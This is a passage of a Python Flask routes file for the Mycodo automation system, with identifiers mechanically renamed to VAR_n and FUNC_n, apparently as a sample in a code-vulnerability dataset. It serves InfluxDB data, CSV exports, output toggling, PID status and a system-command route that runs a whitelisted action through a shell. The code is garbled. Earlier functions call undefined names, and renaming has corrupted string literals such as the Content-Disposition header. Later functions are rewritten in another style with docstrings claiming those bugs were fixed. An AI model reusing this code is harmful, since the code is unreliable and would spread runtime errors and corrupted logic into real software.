return jsonify(datetime.datetime.now().strftime('%m/%d %H:%M'))
@VAR_0.route('/dl/<VAR_11>/<VAR_34:VAR_3>')
@flask_login.login_required
def FUNC_13(VAR_11, VAR_3):
if VAR_11 == 'log':
return send_from_directory(LOG_PATH, VAR_3, as_attachment=True)
return '', 204
@VAR_0.route('/last/<VAR_9>/<VAR_12>/<VAR_13>/<VAR_14>')
@flask_login.login_required
def FUNC_14(VAR_9, VAR_12, VAR_13, VAR_14):
if not str_is_float(VAR_14):
return '', 204
if VAR_12 in ['input', 'math', 'function', 'output', 'pid']:
VAR_47 = InfluxDBClient(
INFLUXDB_HOST,
INFLUXDB_PORT,
INFLUXDB_USER,
INFLUXDB_PASSWORD,
INFLUXDB_DATABASE)
if VAR_12 in ['input', 'math', 'function', 'output', 'pid']:
VAR_83 = DeviceMeasurements.query.filter(
DeviceMeasurements.unique_id == VAR_13).first()
else:
return '', 204
if VAR_83:
VAR_80 = Conversion.query.filter(
Conversion.unique_id == VAR_83.conversion_id).first()
else:
VAR_80 = None
VAR_22, VAR_21, VAR_29 = return_measurement_info(
VAR_83, VAR_80)
if hasattr(VAR_83, 'measurement_type') and VAR_83.measurement_type == 'setpoint':
VAR_107 = PID.query.filter(PID.unique_id == VAR_83.device_id).first()
if VAR_107 and ',' in VAR_107.measurement:
VAR_110 = VAR_107.measurement.split(',')[1]
VAR_111 = DeviceMeasurements.query.filter(
DeviceMeasurements.unique_id == VAR_110).first()
if VAR_111:
VAR_80 = Conversion.query.filter(
Conversion.unique_id == VAR_111.conversion_id).first()
VAR_37, VAR_21, VAR_29 = return_measurement_info(VAR_111, VAR_80)
try:
if VAR_14 != '0':
VAR_61 = query_string(
VAR_21, VAR_9,
VAR_83=VAR_29, VAR_22=channel,
VAR_94='LAST', past_sec=VAR_14)
else:
VAR_61 = query_string(
VAR_21, VAR_9,
VAR_83=VAR_29, VAR_22=channel,
VAR_94='LAST')
if VAR_61 == 1:
return '', 204
VAR_62 = VAR_47.query(VAR_61).raw
VAR_92 = len(VAR_62['series'][0]['values'])
VAR_93 = VAR_62['series'][0]['values'][VAR_92 - 1][0]
VAR_94 = VAR_62['series'][0]['values'][VAR_92 - 1][1]
VAR_94 = float(VAR_94)
VAR_95 = date_parse(VAR_93)
VAR_16 = calendar.timegm(VAR_95.timetuple()) * 1000
VAR_104 = '[{},{}]'.format(VAR_16, VAR_94)
return Response(VAR_104, mimetype='text/json')
except KeyError:
VAR_1.debug("No Data returned form influxdb")
return '', 204
except IndexError:
VAR_1.debug("No Data returned form influxdb")
return '', 204
except Exception as e:
VAR_1.exception("URL for 'last_data' raised and error: "
"{err}".format(err=e))
return '', 204
@VAR_0.route('/past/<VAR_9>/<VAR_12>/<VAR_13>/<VAR_15>')
@flask_login.login_required
def FUNC_15(VAR_9, VAR_12, VAR_13, VAR_15):
if not str_is_float(VAR_15):
return '', 204
if VAR_12 == 'tag':
VAR_76 = []
VAR_77 = NoteTags.query.filter(NoteTags.unique_id == VAR_9).first()
VAR_78 = Notes.query.filter(
Notes.date_time >= (datetime.datetime.utcnow() - datetime.timedelta(seconds=int(VAR_15)))).all()
for each_note in VAR_78:
if VAR_77.unique_id in each_note.tags.split(','):
VAR_76.append(
[each_note.date_time.strftime("%Y-%m-%dT%H:%M:%S.000000000Z"), each_note.name, each_note.note])
if VAR_76:
return jsonify(VAR_76)
else:
return '', 204
elif VAR_12 in ['input', 'math', 'function', 'output', 'pid']:
VAR_47 = InfluxDBClient(
INFLUXDB_HOST,
INFLUXDB_PORT,
INFLUXDB_USER,
INFLUXDB_PASSWORD,
INFLUXDB_DATABASE)
if VAR_12 in ['input', 'math', 'function', 'output', 'pid']:
VAR_83 = DeviceMeasurements.query.filter(
DeviceMeasurements.unique_id == VAR_13).first()
else:
VAR_83 = None
if not VAR_83:
return "Could not find measurement"
if VAR_83:
VAR_80 = Conversion.query.filter(
Conversion.unique_id == VAR_83.conversion_id).first()
else:
VAR_80 = None
VAR_22, VAR_21, VAR_29 = return_measurement_info(
VAR_83, VAR_80)
if hasattr(VAR_83, 'measurement_type') and VAR_83.measurement_type == 'setpoint':
VAR_107 = PID.query.filter(PID.unique_id == VAR_83.device_id).first()
if VAR_107 and ',' in VAR_107.measurement:
VAR_110 = VAR_107.measurement.split(',')[1]
VAR_111 = DeviceMeasurements.query.filter(
DeviceMeasurements.unique_id == VAR_110).first()
if VAR_111:
VAR_80 = Conversion.query.filter(
Conversion.unique_id == VAR_111.conversion_id).first()
VAR_37, VAR_21, VAR_29 = return_measurement_info(VAR_111, VAR_80)
try:
VAR_61 = query_string(
VAR_21, VAR_9,
VAR_83=VAR_29,
VAR_22=channel,
past_sec=VAR_15)
if VAR_61 == 1:
return '', 204
VAR_62 = VAR_47.query(VAR_61).raw
if 'series' in VAR_62 and VAR_62['series']:
return jsonify(VAR_62['series'][0]['values'])
else:
return '', 204
except Exception as e:
VAR_1.debug("URL for 'past_data' raised and error: "
"{err}".format(err=e))
return '', 204
@VAR_0.route('/generate_thermal_image/<VAR_9>/<VAR_16>')
@flask_login.login_required
def FUNC_16(VAR_9, VAR_16):
VAR_44 = datetime.datetime.now().strftime('%Y-%m-%d_%H-%M-%S')
VAR_33 = assure_path_exists(
os.path.join(PATH_CAMERAS, '{uid}'.format(uid=VAR_9)))
VAR_3 = 'Still-{uid}-{VAR_106}.jpg'.format(
uid=VAR_9,
VAR_106=VAR_44).replace(" ", "_")
VAR_45 = assure_path_exists(os.path.join(VAR_33, 'thermal'))
assure_path_exists(VAR_45)
VAR_46 = os.path.join(VAR_45, VAR_3)
VAR_47 = InfluxDBClient(
INFLUXDB_HOST,
INFLUXDB_PORT,
INFLUXDB_USER,
INFLUXDB_PASSWORD,
INFLUXDB_DATABASE)
VAR_48 = Input.query.filter(Input.unique_id == VAR_9).first()
VAR_49 = []
VAR_50 = True
VAR_51 = int(int(VAR_16) / 1000.0) # Round down
VAR_52 = VAR_51 + 1 # Round up
VAR_53 = time.strftime('%Y-%m-%dT%H:%M:%S.000000000Z', time.gmtime(VAR_51))
VAR_54 = time.strftime('%Y-%m-%dT%H:%M:%S.000000000Z', time.gmtime(VAR_52))
for each_channel in range(VAR_48.channels):
VAR_29 = 'channel_{chan}'.format(
chan=each_channel)
VAR_61 = query_string(VAR_29, VAR_9,
VAR_59=VAR_53,
VAR_60=VAR_54)
if VAR_61 == 1:
VAR_1.error('Invalid query string')
VAR_50 = False
else:
VAR_62 = VAR_47.query(VAR_61).raw
if not VAR_62 or 'series' not in VAR_62 or not VAR_62['series']:
VAR_1.error('No measurements to export in this time period')
VAR_50 = False
else:
VAR_49.append(VAR_62['series'][0]['values'][0][1])
if VAR_50:
generate_thermal_image_from_pixels(VAR_49, 8, 8, VAR_46)
return send_file(VAR_46, mimetype='image/jpeg')
else:
return "Could not generate image"
@VAR_0.route('/FUNC_17/<VAR_9>/<VAR_13>/<VAR_17>/<VAR_18>')
@flask_login.login_required
def FUNC_17(VAR_9, VAR_13, VAR_17, VAR_18):
VAR_47 = InfluxDBClient(
INFLUXDB_HOST,
INFLUXDB_PORT,
INFLUXDB_USER,
INFLUXDB_PASSWORD,
INFLUXDB_DATABASE, timeout=100)
VAR_55 = Output.query.filter(Output.unique_id == VAR_9).first()
VAR_48 = Input.query.filter(Input.unique_id == VAR_9).first()
VAR_56 = Math.query.filter(Math.unique_id == VAR_9).first()
if VAR_55:
VAR_79 = VAR_55.name
elif VAR_48:
VAR_79 = VAR_48.name
elif VAR_56:
VAR_79 = VAR_56.name
else:
VAR_79 = None
VAR_57 = DeviceMeasurements.query.filter(
DeviceMeasurements.unique_id == VAR_13).first()
if VAR_57:
VAR_80 = Conversion.query.filter(
Conversion.unique_id == VAR_57.conversion_id).first()
else:
VAR_80 = None
VAR_22, VAR_21, VAR_29 = return_measurement_info(
VAR_57, VAR_80)
VAR_58 = datetime.datetime.utcnow() - datetime.datetime.now()
VAR_51 = datetime.datetime.fromtimestamp(float(VAR_17))
VAR_51 += VAR_58
VAR_59 = VAR_51.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
VAR_52 = datetime.datetime.fromtimestamp(float(VAR_18))
VAR_52 += VAR_58
VAR_60 = VAR_52.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
VAR_61 = query_string(
VAR_21, VAR_9,
VAR_83=VAR_29, VAR_22=channel,
VAR_59=start_str, VAR_60=end_str)
if VAR_61 == 1:
flash('Invalid query string', 'error')
return redirect(url_for('routes_page.page_export'))
VAR_62 = VAR_47.query(VAR_61).raw
if not VAR_62 or 'series' not in VAR_62 or not VAR_62['series']:
flash('No measurements to export in this time period', 'error')
return redirect(url_for('routes_page.page_export'))
VAR_63 = 'timestamp (UTC)'
VAR_64 = '{VAR_79} {meas} ({id})'.format(
VAR_79=name, meas=VAR_29, id=VAR_9)
VAR_65 = '{id}VAR_37{VAR_79}VAR_37{meas}.csv'.format(
id=VAR_9, VAR_79=name, meas=VAR_29)
import csv
from io import StringIO
def FUNC_26(VAR_66):
VAR_81 = StringIO()
VAR_82 = csv.writer(VAR_81)
VAR_82.writerow([VAR_63, VAR_64])
for csv_line in VAR_66:
VAR_82.writerow([
str(csv_line[0][:-4]).replace('T', ' '),
csv_line[1]
])
VAR_81.seek(0)
yield VAR_81.read()
VAR_81.truncate(0)
VAR_81.seek(0)
VAR_67 = Response(FUNC_26(VAR_62['series'][0]['values']), mimetype='text/csv')
VAR_67.headers['Content-Disposition'] = 'attachment; VAR_3="{}"'.format(VAR_65)
return VAR_67
@VAR_0.route('/async/<VAR_19>/<VAR_20>/<VAR_13>/<VAR_17>/<VAR_18>')
@flask_login.login_required
def FUNC_18(VAR_19, VAR_20, VAR_13, VAR_17, VAR_18):
if VAR_20 == 'tag':
VAR_76 = []
VAR_77 = NoteTags.query.filter(NoteTags.unique_id == VAR_19).first()
VAR_51 = datetime.datetime.utcfromtimestamp(float(VAR_17))
if VAR_18 == '0':
VAR_52 = datetime.datetime.utcnow()
else:
VAR_52 = datetime.datetime.utcfromtimestamp(float(VAR_18))
VAR_78 = Notes.query.filter(
and_(Notes.date_time >= VAR_51, Notes.date_time <= VAR_52)).all()
for each_note in VAR_78:
if VAR_77.unique_id in each_note.tags.split(','):
VAR_76.append(
[each_note.date_time.strftime("%Y-%m-%dT%H:%M:%S.000000000Z"), each_note.name, each_note.note])
if VAR_76:
return jsonify(VAR_76)
else:
return '', 204
VAR_47 = InfluxDBClient(
INFLUXDB_HOST,
INFLUXDB_PORT,
INFLUXDB_USER,
INFLUXDB_PASSWORD,
INFLUXDB_DATABASE)
if VAR_20 in ['input', 'math', 'function', 'output', 'pid']:
VAR_83 = DeviceMeasurements.query.filter(
DeviceMeasurements.unique_id == VAR_13).first()
else:
VAR_83 = None
if not VAR_83:
return "Could not find measurement"
if VAR_83:
VAR_80 = Conversion.query.filter(
Conversion.unique_id == VAR_83.conversion_id).first()
else:
VAR_80 = None
VAR_22, VAR_21, VAR_29 = return_measurement_info(
VAR_83, VAR_80)
if VAR_17 == '0' and VAR_18 == '0':
VAR_61 = query_string(
VAR_21, VAR_19,
VAR_83=VAR_29,
VAR_22=channel,
VAR_94='COUNT')
if VAR_61 == 1:
return '', 204
VAR_62 = VAR_47.query(VAR_61).raw
VAR_84 = VAR_62['series'][0]['values'][0][1]
VAR_61 = query_string(
VAR_21, VAR_19,
VAR_83=VAR_29,
VAR_22=channel,
limit=1)
if VAR_61 == 1:
return '', 204
VAR_62 = VAR_47.query(VAR_61).raw
try:
VAR_87 = VAR_62['series'][0]['values'][0][0]
except:
return '', 204
VAR_52 = datetime.datetime.utcnow()
VAR_60 = VAR_52.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
elif VAR_17 != '0' and VAR_18 == '0':
VAR_51 = datetime.datetime.utcfromtimestamp(float(VAR_17))
VAR_59 = VAR_51.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
VAR_52 = datetime.datetime.utcnow()
VAR_60 = VAR_52.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
VAR_61 = query_string(
VAR_21, VAR_19,
VAR_83=VAR_29,
VAR_22=channel,
VAR_94='COUNT',
VAR_59=start_str,
VAR_60=end_str)
if VAR_61 == 1:
return '', 204
VAR_62 = VAR_47.query(VAR_61).raw
try:
VAR_84 = VAR_62['series'][0]['values'][0][1]
except:
return '', 204
VAR_61 = query_string(
VAR_21, VAR_19,
VAR_83=VAR_29,
VAR_22=channel,
VAR_59=start_str,
VAR_60=end_str,
limit=1)
if VAR_61 == 1:
return '', 204
VAR_62 = VAR_47.query(VAR_61).raw
try:
VAR_87 = VAR_62['series'][0]['values'][0][0]
except:
return '', 204
else:
VAR_51 = datetime.datetime.utcfromtimestamp(float(VAR_17))
VAR_59 = VAR_51.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
VAR_52 = datetime.datetime.utcfromtimestamp(float(VAR_18))
VAR_60 = VAR_52.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
VAR_61 = query_string(
VAR_21, VAR_19,
VAR_83=VAR_29,
VAR_22=channel,
VAR_94='COUNT',
VAR_59=start_str,
VAR_60=end_str)
if VAR_61 == 1:
return '', 204
VAR_62 = VAR_47.query(VAR_61).raw
try:
VAR_84 = VAR_62['series'][0]['values'][0][1]
except:
return '', 204
VAR_61 = query_string(
VAR_21, VAR_19,
VAR_83=VAR_29,
VAR_22=channel,
VAR_59=start_str,
VAR_60=end_str,
limit=1)
if VAR_61 == 1:
return '', 204
VAR_62 = VAR_47.query(VAR_61).raw
try:
VAR_87 = VAR_62['series'][0]['values'][0][0]
except:
return '', 204
VAR_51 = datetime.datetime.strptime(
influx_time_str_to_milliseconds(VAR_87),
'%Y-%m-%dT%H:%M:%S.%f')
VAR_59 = VAR_51.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
VAR_1.debug('Count = {}'.format(VAR_84))
VAR_1.debug('Start = {}'.format(VAR_51))
VAR_1.debug('End = {}'.format(VAR_52))
VAR_68 = (VAR_52 - VAR_51).total_seconds()
VAR_1.debug('Difference seconds = {}'.format(VAR_68))
if VAR_84 > 700:
VAR_85 = VAR_68 / VAR_84
VAR_1.debug('Seconds per point = {}'.format(VAR_85))
VAR_86 = int(VAR_68 / 700)
VAR_1.debug('Group seconds = {}'.format(VAR_86))
try:
VAR_61 = query_string(
VAR_21, VAR_19,
VAR_83=VAR_29,
VAR_22=channel,
VAR_94='MEAN',
VAR_59=start_str,
VAR_60=end_str,
group_sec=VAR_86)
if VAR_61 == 1:
return '', 204
VAR_62 = VAR_47.query(VAR_61).raw
try:
return jsonify(VAR_62['series'][0]['values'])
except:
return '', 204
except Exception as e:
VAR_1.error("URL for 'async_data' raised and error: "
"{err}".format(err=e))
return '', 204
else:
try:
VAR_61 = query_string(
VAR_21, VAR_19,
VAR_83=VAR_29,
VAR_22=channel,
VAR_59=start_str,
VAR_60=end_str)
if VAR_61 == 1:
return '', 204
VAR_62 = VAR_47.query(VAR_61).raw
return jsonify(VAR_62['series'][0]['values'])
except Exception as e:
VAR_1.error("URL for 'async_data' raised and error: "
"{err}".format(err=e))
return '', 204
@VAR_0.route('/async_usage/<VAR_19>/<VAR_21>/<VAR_22>/<VAR_17>/<VAR_18>')
@flask_login.login_required
def FUNC_19(VAR_19, VAR_21, VAR_22, VAR_17, VAR_18):
    """Return asynchronous output-usage data from InfluxDB as JSON.

    VAR_19: unique id of the device measured.
    VAR_21: measurement unit queried in InfluxDB.
    VAR_22: channel of the measurement.
    VAR_17 / VAR_18: start/end times as epoch seconds; '0' = unbounded.

    When more than 700 points fall inside the requested window the
    series is downsampled with MEAN over computed group intervals so
    the response stays small. Responds HTTP 204 on failure or no data.

    Fixes: query keyword values previously referenced the undefined
    names 'channel'/'start_str'/'end_str' (NameError at runtime), and
    the downsampled branch logged the wrong route label ('async_data').
    """
    VAR_47 = InfluxDBClient(
        INFLUXDB_HOST,
        INFLUXDB_PORT,
        INFLUXDB_USER,
        INFLUXDB_PASSWORD,
        INFLUXDB_DATABASE)

    if VAR_17 == '0' and VAR_18 == '0':
        # Unbounded window: count every point, fetch the earliest
        # timestamp; the end of the window is "now".
        VAR_61 = query_string(
            VAR_21, VAR_19,
            VAR_22=VAR_22,
            VAR_94='COUNT')
        if VAR_61 == 1:
            return '', 204
        VAR_62 = VAR_47.query(VAR_61).raw
        VAR_84 = VAR_62['series'][0]['values'][0][1]
        VAR_61 = query_string(
            VAR_21, VAR_19,
            VAR_22=VAR_22,
            limit=1)
        if VAR_61 == 1:
            return '', 204
        VAR_62 = VAR_47.query(VAR_61).raw
        VAR_87 = VAR_62['series'][0]['values'][0][0]
        VAR_52 = datetime.datetime.utcnow()
        VAR_60 = VAR_52.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
    elif VAR_17 != '0' and VAR_18 == '0':
        # Bounded start, open end (now)
        VAR_51 = datetime.datetime.utcfromtimestamp(float(VAR_17))
        VAR_59 = VAR_51.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
        VAR_52 = datetime.datetime.utcnow()
        VAR_60 = VAR_52.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
        VAR_61 = query_string(
            VAR_21, VAR_19,
            VAR_22=VAR_22,
            VAR_94='COUNT',
            VAR_59=VAR_59,
            VAR_60=VAR_60)
        if VAR_61 == 1:
            return '', 204
        VAR_62 = VAR_47.query(VAR_61).raw
        VAR_84 = VAR_62['series'][0]['values'][0][1]
        VAR_61 = query_string(
            VAR_21, VAR_19,
            VAR_22=VAR_22,
            VAR_59=VAR_59,
            VAR_60=VAR_60,
            limit=1)
        if VAR_61 == 1:
            return '', 204
        VAR_62 = VAR_47.query(VAR_61).raw
        VAR_87 = VAR_62['series'][0]['values'][0][0]
    else:
        # Fully bounded window
        VAR_51 = datetime.datetime.utcfromtimestamp(float(VAR_17))
        VAR_59 = VAR_51.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
        VAR_52 = datetime.datetime.utcfromtimestamp(float(VAR_18))
        VAR_60 = VAR_52.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
        VAR_61 = query_string(
            VAR_21, VAR_19,
            VAR_22=VAR_22,
            VAR_94='COUNT',
            VAR_59=VAR_59,
            VAR_60=VAR_60)
        if VAR_61 == 1:
            return '', 204
        VAR_62 = VAR_47.query(VAR_61).raw
        VAR_84 = VAR_62['series'][0]['values'][0][1]
        VAR_61 = query_string(
            VAR_21, VAR_19,
            VAR_22=VAR_22,
            VAR_59=VAR_59,
            VAR_60=VAR_60,
            limit=1)
        if VAR_61 == 1:
            return '', 204
        VAR_62 = VAR_47.query(VAR_61).raw
        VAR_87 = VAR_62['series'][0]['values'][0][0]

    # Clamp the window start to the first recorded point
    VAR_51 = datetime.datetime.strptime(
        influx_time_str_to_milliseconds(VAR_87),
        '%Y-%m-%dT%H:%M:%S.%f')
    VAR_59 = VAR_51.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
    VAR_1.debug('Count = {}'.format(VAR_84))
    VAR_1.debug('Start = {}'.format(VAR_51))
    VAR_1.debug('End = {}'.format(VAR_52))
    VAR_68 = (VAR_52 - VAR_51).total_seconds()
    VAR_1.debug('Difference seconds = {}'.format(VAR_68))

    if VAR_84 > 700:
        # Too many points to return raw: downsample with MEAN
        VAR_85 = VAR_68 / VAR_84
        VAR_1.debug('Seconds per point = {}'.format(VAR_85))
        VAR_86 = int(VAR_68 / 700)
        VAR_1.debug('Group seconds = {}'.format(VAR_86))
        try:
            VAR_61 = query_string(
                VAR_21, VAR_19,
                VAR_22=VAR_22,
                VAR_94='MEAN',
                VAR_59=VAR_59,
                VAR_60=VAR_60,
                group_sec=VAR_86)
            if VAR_61 == 1:
                return '', 204
            VAR_62 = VAR_47.query(VAR_61).raw
            return jsonify(VAR_62['series'][0]['values'])
        except Exception as e:
            VAR_1.error("URL for 'async_usage' raised and error: "
                        "{err}".format(err=e))
            return '', 204
    else:
        try:
            VAR_61 = query_string(
                VAR_21, VAR_19,
                VAR_22=VAR_22,
                VAR_59=VAR_59,
                VAR_60=VAR_60)
            if VAR_61 == 1:
                return '', 204
            VAR_62 = VAR_47.query(VAR_61).raw
            return jsonify(VAR_62['series'][0]['values'])
        except Exception as e:
            VAR_1.error("URL for 'async_usage' raised and error: "
                        "{err}".format(err=e))
            return '', 204
@VAR_0.route('/FUNC_20/<VAR_23>/<VAR_22>/<VAR_24>/<VAR_25>/<VAR_26>')
@flask_login.login_required
def FUNC_20(VAR_23, VAR_22, VAR_24, VAR_25, VAR_26):
    """Turn an output on or off via the daemon.

    VAR_23: output unique id.
    VAR_22: output channel number, or an OutputChannel unique id.
    VAR_24: desired state, 'on' or 'off'.
    VAR_25: output type ('sec', 'pwm', 'vol', or 'value').
    VAR_26: amount (seconds / duty cycle / volume / value).

    Fixes: keyword values previously referenced the undefined names
    'output_type' and 'output_channel' (NameError at runtime).
    """
    if not utils_general.user_has_permission('edit_controllers'):
        return 'Insufficient user permissions to manipulate outputs'

    # Resolve the channel: either an integer was passed directly, or an
    # OutputChannel unique id that must be looked up.
    if is_int(VAR_22):
        VAR_88 = int(VAR_22)
    else:
        VAR_89 = db_retrieve_table(OutputChannel).filter(
            OutputChannel.unique_id == VAR_22).first()
        if VAR_89:
            VAR_88 = VAR_89.channel
        else:
            return "Could not determine output channel number from channel ID '{}'".format(VAR_22)

    VAR_69 = DaemonControl()
    # Only allow on/off with a non-negative duration/duty-cycle, or a
    # volume/value amount.
    if (VAR_24 in ['on', 'off'] and str_is_float(VAR_26) and
            (
                (VAR_25 in ['sec', 'pwm'] and float(VAR_26) >= 0) or
                VAR_25 == 'vol' or
                VAR_25 == 'value'
            )):
        VAR_90 = VAR_69.output_on_off(
            VAR_23,
            VAR_24,
            VAR_25=VAR_25,
            VAR_26=float(VAR_26),
            VAR_88=VAR_88)
        if VAR_90[0]:
            return 'ERROR: {}'.format(VAR_90[1])
        else:
            return 'SUCCESS: {}'.format(VAR_90[1])
    else:
        return 'ERROR: unknown parameters: ' \
               'output_id: {}, channel: {}, state: {}, output_type: {}, amount: {}'.format(
                   VAR_23, VAR_22, VAR_24, VAR_25, VAR_26)
@VAR_0.route('/daemonactive')
@flask_login.login_required
def FUNC_21():
    """Report the daemon status, or '0' if the daemon is unreachable."""
    try:
        return DaemonControl().daemon_status()
    except Exception as e:
        VAR_1.error("URL for 'daemon_active' raised and error: "
                    "{err}".format(err=e))
        return '0'
@VAR_0.route('/systemctl/<VAR_27>')
@flask_login.login_required
def FUNC_22(VAR_27):
    """Execute a whitelisted system command (restart, shutdown,
    daemon_restart, or frontend_reload).

    Fixes: the format keyword values previously referenced the undefined
    name 'action' (NameError at runtime), and two flash messages carried
    the mangled word 'VAR_69' where 'daemon' was intended.
    """
    if not utils_general.user_has_permission('edit_settings'):
        return redirect(url_for('routes_general.home'))
    try:
        # Whitelist guard: VAR_27 is later interpolated into a shell
        # command, so only these four values may pass through.
        if VAR_27 not in ['restart', 'shutdown', 'daemon_restart', 'frontend_reload']:
            flash("Unrecognized command: {VAR_27}".format(
                VAR_27=VAR_27), "success")
            return redirect('/settings')
        if DOCKER_CONTAINER:
            # Inside Docker there is no wrapper script; signal directly
            if VAR_27 == 'daemon_restart':
                VAR_91 = DaemonControl()
                VAR_91.terminate_daemon()
                flash(gettext("Command to restart the daemon sent"), "success")
            elif VAR_27 == 'frontend_reload':
                subprocess.Popen('docker restart mycodo_flask 2>&1', shell=True)
                flash(gettext("Command to reload the frontend sent"), "success")
        else:
            # VAR_27 was validated against the whitelist above, so the
            # shell interpolation here cannot receive untrusted input.
            VAR_108 = '{VAR_34}/mycodo/scripts/mycodo_wrapper {VAR_27} 2>&1'.format(
                VAR_34=INSTALL_DIRECTORY, VAR_27=VAR_27)
            subprocess.Popen(VAR_108, shell=True)
            if VAR_27 == 'restart':
                flash(gettext("System rebooting in 10 seconds"), "success")
            elif VAR_27 == 'shutdown':
                flash(gettext("System shutting down in 10 seconds"), "success")
            elif VAR_27 == 'daemon_restart':
                flash(gettext("Command to restart the daemon sent"), "success")
            elif VAR_27 == 'frontend_reload':
                flash(gettext("Command to reload the frontend sent"), "success")
        return redirect('/settings')
    except Exception as e:
        VAR_1.error("System command '{VAR_108}' raised and error: "
                    "{err}".format(VAR_108=VAR_27, err=e))
        flash("System command '{VAR_108}' raised and error: "
              "{err}".format(VAR_108=VAR_27, err=e), "error")
        return redirect(url_for('routes_general.home'))
def FUNC_23(VAR_28, VAR_21, VAR_14, VAR_29=None, VAR_22=None):
    """Return the most recent measurement as [epoch_ms, value_string].

    VAR_28: device unique id; VAR_21: unit; VAR_14: look-back window in
    seconds; VAR_29: optional measurement name; VAR_22: optional channel.
    The value is formatted to three decimal places. Returns
    [None, None] when the query is invalid, fails, or has no data.

    Fix: the channel keyword previously referenced the undefined name
    'channel' (NameError at runtime); it must forward VAR_22.
    """
    VAR_47 = InfluxDBClient(
        INFLUXDB_HOST,
        INFLUXDB_PORT,
        INFLUXDB_USER,
        INFLUXDB_PASSWORD,
        INFLUXDB_DATABASE)
    VAR_61 = query_string(
        VAR_21,
        VAR_28,
        VAR_83=VAR_29,
        VAR_22=VAR_22,
        VAR_94='LAST',
        past_sec=VAR_14)
    if VAR_61 == 1:
        return [None, None]
    try:
        VAR_62 = VAR_47.query(VAR_61).raw
        VAR_92 = len(VAR_62['series'][0]['values'])
        VAR_93 = VAR_62['series'][0]['values'][VAR_92 - 1][0]
        VAR_94 = VAR_62['series'][0]['values'][VAR_92 - 1][1]
        VAR_94 = '{:.3f}'.format(float(VAR_94))
        # Convert the influx timestamp string to epoch milliseconds
        VAR_95 = date_parse(VAR_93)
        VAR_16 = calendar.timegm(VAR_95.timetuple()) * 1000
        return [VAR_16, VAR_94]
    except KeyError:
        return [None, None]
    except Exception:
        return [None, None]
@VAR_0.route('/last_pid/<VAR_30>/<VAR_31>')
@flask_login.login_required
def FUNC_24(VAR_30, VAR_31):
    """Return the latest PID controller values as JSON.

    VAR_30: PID unique id; VAR_31: look-back window in seconds.
    The response includes activation flags, setpoint, P/I/D terms, the
    combined PID value, duration, duty cycle, and the actual measured
    input value. Responds HTTP 204 on failure.

    Fix: the bare 'except:' around the setpoint-band fetch was narrowed
    to 'except Exception:' so it no longer swallows SystemExit et al.
    """
    if not str_is_float(VAR_31):
        return '', 204
    try:
        VAR_70 = PID.query.filter(PID.unique_id == VAR_30).first()
        # PID.measurement is 'device_id,measurement_id'
        if len(VAR_70.measurement.split(',')) == 2:
            VAR_19 = VAR_70.measurement.split(',')[0]
            VAR_13 = VAR_70.measurement.split(',')[1]
        else:
            VAR_19 = None
            VAR_13 = None

        # Resolve channel/unit/measurement of the PID's input
        VAR_96 = DeviceMeasurements.query.filter(
            DeviceMeasurements.unique_id == VAR_13).first()
        if VAR_96:
            VAR_109 = Conversion.query.filter(
                Conversion.unique_id == VAR_96.conversion_id).first()
        else:
            VAR_109 = None
        (VAR_97,
         VAR_98,
         VAR_96) = return_measurement_info(
            VAR_96, VAR_109)

        # Unit used to chart the setpoint (same as the input measurement)
        VAR_99 = None
        if VAR_70 and ',' in VAR_70.measurement:
            VAR_110 = VAR_70.measurement.split(',')[1]
            VAR_111 = DeviceMeasurements.query.filter(
                DeviceMeasurements.unique_id == VAR_110).first()
            if VAR_111:
                VAR_80 = Conversion.query.filter(
                    Conversion.unique_id == VAR_111.conversion_id).first()
                VAR_37, VAR_99, VAR_37 = return_measurement_info(VAR_111, VAR_80)

        VAR_100 = FUNC_23(
            VAR_30, 'pid_value', VAR_31, VAR_29='pid_p_value')
        VAR_101 = FUNC_23(
            VAR_30, 'pid_value', VAR_31, VAR_29='pid_i_value')
        VAR_102 = FUNC_23(
            VAR_30, 'pid_value', VAR_31, VAR_29='pid_d_value')
        # Combined PID output is only meaningful when all three terms exist
        if None not in (VAR_100[1], VAR_101[1], VAR_102[1]):
            VAR_112 = [VAR_100[0], '{:.3f}'.format(float(VAR_100[1]) + float(VAR_101[1]) + float(VAR_102[1]))]
        else:
            VAR_112 = None

        VAR_103 = None
        if VAR_70.band:
            try:
                VAR_69 = DaemonControl()
                VAR_103 = VAR_69.pid_get(VAR_70.unique_id, 'setpoint_band')
            except Exception:
                VAR_1.debug("Couldn't get setpoint")

        VAR_104 = {
            'activated': VAR_70.is_activated,
            'paused': VAR_70.is_paused,
            'held': VAR_70.is_held,
            'setpoint': FUNC_23(
                VAR_30, VAR_99, VAR_31, VAR_22=0),
            'setpoint_band': VAR_103,
            'pid_p_value': VAR_100,
            'pid_i_value': VAR_101,
            'pid_d_value': VAR_102,
            'pid_pid_value': VAR_112,
            'duration_time': FUNC_23(
                VAR_30, 's', VAR_31, VAR_29='duration_time'),
            'duty_cycle': FUNC_23(
                VAR_30, 'percent', VAR_31, VAR_29='duty_cycle'),
            'actual': FUNC_23(
                VAR_19,
                VAR_98,
                VAR_31,
                VAR_29=VAR_96,
                VAR_22=VAR_97)
        }
        return jsonify(VAR_104)
    except KeyError:
        VAR_1.debug("No Data returned form influxdb")
        return '', 204
    except Exception as e:
        VAR_1.exception("URL for 'last_pid' raised and error: "
                        "{err}".format(err=e))
        return '', 204
@VAR_0.route('/FUNC_25/<VAR_9>/<VAR_24>')
@flask_login.login_required
def FUNC_25(VAR_9, VAR_24):
    """Modify a PID controller: activate, deactivate, pause, hold,
    resume, or change its setpoint (action 'set_setpoint_pid|<value>').
    """
    if not utils_general.user_has_permission('edit_controllers'):
        return 'Insufficient user permissions to manipulate PID'

    pid = PID.query.filter(PID.unique_id == VAR_9).first()
    control = DaemonControl()

    if VAR_24 == 'activate_pid':
        pid.is_activated = True
        pid.save()
        _, return_str = control.controller_activate(pid.unique_id)
        return return_str

    if VAR_24 == 'deactivate_pid':
        pid.is_activated = False
        pid.is_paused = False
